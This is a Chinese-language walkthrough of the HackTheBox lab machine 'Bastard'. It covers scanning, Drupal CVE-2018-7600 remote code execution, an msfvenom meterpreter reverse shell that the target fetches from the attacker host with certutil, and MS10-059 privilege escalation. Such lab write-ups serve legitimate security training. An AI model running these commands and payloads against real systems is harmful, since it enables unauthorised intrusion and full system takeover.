HackTheBox: Bastard 靶机渗透教学文档<\/h1>

0x00 环境准备<\/h2>

靶机IP<\/strong>: 10.10.10.9<\/li>
攻击机IP<\/strong>: 10.10.16.4 (Kali Linux)<\/li>

网络连接<\/strong>: 通过HackTheBox提供的VPN代理连接<\/li> <\/ul>
0x01 信息收集阶段<\/h2>
端口扫描<\/h3>

TCP全端口扫描<\/strong>:<\/p>
sudo nmap --min-rate 10000<\/span> -p- 10.10.10.9 <\/span><\/span><\/code><\/pre>发现开放端口: 80, 135, 49154<\/p> <\/li> UDP端口扫描<\/strong>:<\/p> sudo nmap -sU --min-rate 10000<\/span> -p- 10.10.10.9 <\/span><\/span><\/code><\/pre>(此靶机未发现可利用UDP服务)<\/p> <\/li> 详细服务扫描<\/strong>:<\/p> sudo nmap -sT -sV -O -p80,135,49154 10.10.10.9 <\/span><\/span><\/code><\/pre>确定80端口运行HTTP服务<\/p> <\/li> 漏洞脚本扫描<\/strong>:<\/p> sudo nmap --script=<\/span>vuln -p80,135,49154 10.10.10.9 <\/span><\/span><\/code><\/pre><\/li> <\/ol> Web信息收集<\/h3> Web技术识别<\/strong>:<\/p> whatweb http:\/\/10.10.10.9 <\/span><\/span><\/code><\/pre>识别出Drupal CMS<\/p> <\/li> 目录扫描<\/strong>:<\/p> gobuster dir --url http:\/\/10.10.10.9\/ -x txt,html,sql,zip,rar -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt <\/span><\/span><\/code><\/pre>可尝试手动检查\/robots.txt<\/code>等常见路径<\/p> <\/li> 版本识别<\/strong>:<\/p> curl -s http:\/\/10.10.10.9\/CHANGELOG.txt | grep -m2 ""<\/span> <\/span><\/span><\/code><\/pre>确认Drupal版本为7.54<\/p> <\/li> <\/ol> 0x02 漏洞利用<\/h2> Drupal RCE漏洞(CVE-2018-7600)<\/h3> 漏洞验证<\/strong>:<\/p> 使用公开的Drupal 7.x RCE漏洞利用脚本<\/li> 验证命令执行: python3 drupa7-CVE-2018-7600.py -c=<\/span>"wmic OS get OSArchitecture"<\/span> http:\/\/10.10.10.9\/ <\/span><\/span><\/code><\/pre>确认系统架构为64位Windows<\/li> <\/ul> <\/li> 生成反弹shell<\/strong>:<\/p> msfvenom -p windows\/x64\/meterpreter\/reverse_tcp -a x64 --platform windows LHOST=<\/span>10.10.16.4 LPORT=<\/span>4444<\/span> -f exe >> l7.exe <\/span><\/span><\/code><\/pre><\/li> 设置HTTP服务传输payload<\/strong>:<\/p> python3 -m http.server 80<\/span> <\/span><\/span><\/code><\/pre><\/li> 靶机下载并执行payload<\/strong>:<\/p> python3 drupa7-CVE-2018-7600.py -c=<\/span>"certutil.exe -urlcache -split -f http:\/\/10.10.16.4\/l7.exe l7.exe"<\/span> http:\/\/10.10.10.9\/ <\/span><\/span>python3 drupa7-CVE-2018-7600.py -c=<\/span>"l7.exe"<\/span> http:\/\/10.10.10.9\/ <\/span><\/span><\/code><\/pre><\/li> Metasploit监听<\/strong>:<\/p> msfconsole <\/span><\/span>use multi\/handler <\/span><\/span>set payload windows\/x64\/meterpreter\/reverse_tcp <\/span><\/span>set LHOST 10.10.16.4 <\/span><\/span>set LPORT 4444<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre><\/li> <\/ol> 0x03 权限提升<\/h2> 本地漏洞利用<\/h3> 自动漏洞建议<\/strong>:<\/p> run post\/multi\/recon\/local_exploit_suggester <\/span><\/span><\/code><\/pre>或手动尝试已知漏洞<\/p> <\/li> 使用MS10-059漏洞提权<\/strong>:<\/p> 下载漏洞利用程序: wget https:\/\/github.com\/SecWiki\/windows-kernel-exploits\/blob\/master\/MS10-059\/MS10-059.exe <\/span><\/span><\/code><\/pre><\/li> 上传至靶机(方法同上)<\/li> 执行提权操作<\/li> <\/ul> <\/li> 获取flag<\/strong>:<\/p> 用户flag: C:\Users\user\Desktop\user.txt<\/code><\/li> 系统flag: C:\Users\Administrator\Desktop\root.txt<\/code><\/li> <\/ul> <\/li> <\/ol> 关键点总结<\/h2> 信息收集要全面<\/strong>:<\/p> 不要忽略UDP扫描<\/li> Web技术识别和版本确认至关重要<\/li> <\/ul> <\/li> 漏洞利用注意事项<\/strong>:<\/p> Drupal 7.54存在多个RCE漏洞<\/li> 命令执行时要考虑Windows环境特性<\/li> 反弹shell路径要正确<\/li> <\/ul> <\/li> 权限提升技巧<\/strong>:<\/p> Windows系统常见提权漏洞MS10-059<\/li> 使用Metasploit的local_exploit_suggester模块辅助<\/li> <\/ul> <\/li> 问题解决<\/strong>:<\/p> 遇到php-curl错误可尝试: sudo apt-get install php-curl<\/code><\/li> 执行路径问题要注意当前工作目录<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> Drupal 7.x Module Services RCE<\/a><\/li> MS10-059漏洞利用<\/a><\/li> 完整Walkthrough<\/a><\/li> <\/ol>